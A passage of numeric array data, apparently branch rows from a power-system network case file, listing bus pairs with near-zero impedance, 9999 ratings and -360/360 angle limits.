0, 1, -360, 360 ], [1131, 142, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1132, 144, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1133, 145, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1134, 146, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1135, 147, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1136, 148, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1137, 149, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1138, 150, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1139, 151, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1140, 152, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1141, 153, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1142, 154, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1143, 155, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1144, 158, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1145, 161, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1146, 162, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1147, 163, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1148, 164, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1149, 166, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1150, 167, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1151, 168, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1152, 169, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1153, 170, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1154, 171, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1155, 172, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1156, 173, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1157, 174, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1158, 175, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1159, 176, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1160, 177, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1161, 178, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1162, 179, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1163, 180, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1164, 181, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1165, 182, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1166, 183, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1167, 185, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1168, 186, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1169, 187, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1170, 188, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1171, 189, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1172, 190, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1173, 192, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1174, 193, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1175, 194, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1176, 196, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1177, 197, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1178, 198, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1179, 199, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1180, 200, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1181, 202, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1182, 203, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1183, 204, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1184, 205, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1185, 206, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1186, 207, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1187, 208, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1188, 209, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1189, 210, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1190, 211, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1191, 212, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1192, 213, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1193, 214, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1194, 215, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1195, 216, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1196, 217, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1197, 218, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1198, 219, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1199, 221, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1200, 222, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1201, 223, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1202, 224, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1203, 225, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1204, 226, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1205, 227, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1206, 228, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1207, 229, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1208, 230, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1209, 234, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1210, 235, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1211, 237, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1212, 238, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1213, 239, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1214, 240, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1215, 241, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1216, 242, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1217, 243, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1218, 244, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1219, 247, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1220, 251, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1221, 252, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1222, 253, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1223, 254, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1224, 255, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1225, 256, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1226, 257, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1227, 258, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1228, 260, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1229, 263, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1230, 264, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1231, 266, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1232, 267, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1233, 268, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1235, 271, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1236, 272, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1237, 273, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1238, 274, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1239, 275, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1240, 276, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1241, 278, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1242, 281, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1243, 282, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1244, 283, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1245, 284, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1246, 285, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1247, 286, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1248, 287, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1249, 288, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1250, 289, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1251, 291, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1252, 292, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1253, 293, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1254, 294, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1255, 295, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1256, 296, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1257, 297, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1258, 298, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1259, 299, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1260, 300, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1261, 302, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1262, 303, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1263, 304, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1264, 307, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1265, 308, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1266, 309, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1267, 311, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1268, 312, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1269, 314, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1270, 316, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1271, 317, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1272, 318, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1273, 319, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1274, 321, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1275, 322, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1276, 323, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1277, 324, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1278, 325, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1279, 326, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1280, 327, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1281, 328, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1282, 329, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1283, 331, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1284, 333, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1285, 335, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1286, 337, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1287, 338, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1288, 339, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1289, 340, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1290, 341, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1291, 342, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1292, 343, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1293, 344, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1294, 345, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1295, 346, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1296, 347, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1297, 348, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1298, 350, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1299, 352, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1300, 353, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1301, 354, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1302, 355, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1303, 356, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1304, 357, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1305, 359, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1306, 361, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1307, 362, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1308, 363, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1309, 364, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1310, 365, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1311, 366, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1312, 367, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1313, 368, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1314, 369, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1315, 370, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1316, 371, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1317, 372, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1318, 373, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1319, 374, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1320, 375, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1321, 376, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1322, 377, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1323, 378, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1324, 379, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1325, 381, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1326, 384, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1327, 385, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1328, 386, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1329, 387, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1330, 388, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1331, 390, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1332, 391, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1333, 392, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1334, 393, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1335, 394, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1336, 395, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1337, 396, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1338, 397, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1339, 398, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1340, 399, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1341, 400, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1342, 403, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1343, 404, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1344, 405, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1345, 406, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1346, 407, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1347, 408, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1348, 410, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1349, 411, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1350, 412, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1352, 414, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1355, 418, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1356, 419, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1357, 420, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1358, 421, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1359, 422, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1360, 423, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1361, 424, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1362, 425, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1363, 426, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1364, 427, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1365, 428, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1366, 429, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1367, 430, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1368, 431, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1369, 432, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1370, 433, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1371, 434, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1372, 435, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1373, 436, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1374, 437, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1375, 438, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1376, 439, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1377, 440, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1378, 441, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1379, 442, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1380, 443, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1381, 445, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1382, 446, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1383, 447, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1384, 448, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1385, 449, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1386, 450, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1387, 451, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1388, 453, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1389, 454, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1390, 455, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1391, 456, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1392, 457, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1393, 458, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1394, 459, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1395, 460, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1396, 461, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1397, 462, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1398, 463, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1399, 464, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1400, 465, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1401, 466, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1402, 467, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1403, 468, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1404, 469, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1405, 470, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1406, 471, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1407, 472, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1408, 473, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1409, 474, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1410, 475, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1411, 476, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1412, 477, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1413, 478, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1414, 479, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1415, 480, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1416, 481, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1417, 482, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1418, 483, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1419, 484, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1420, 485, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1421, 486, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1422, 487, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1423, 488, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1424, 489, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1425, 490, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1426, 491, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1427, 492, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1428, 493, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1429, 494, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1430, 495, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1431, 496, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1432, 497, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1433, 498, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1434, 499, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1435, 500, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1436, 501, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1437, 502, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1438, 503, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1439, 504, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1440, 505, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1441, 506, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1442, 507, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1443, 508, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1444, 509, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1445, 510, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1446, 511, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1447, 512, 0, 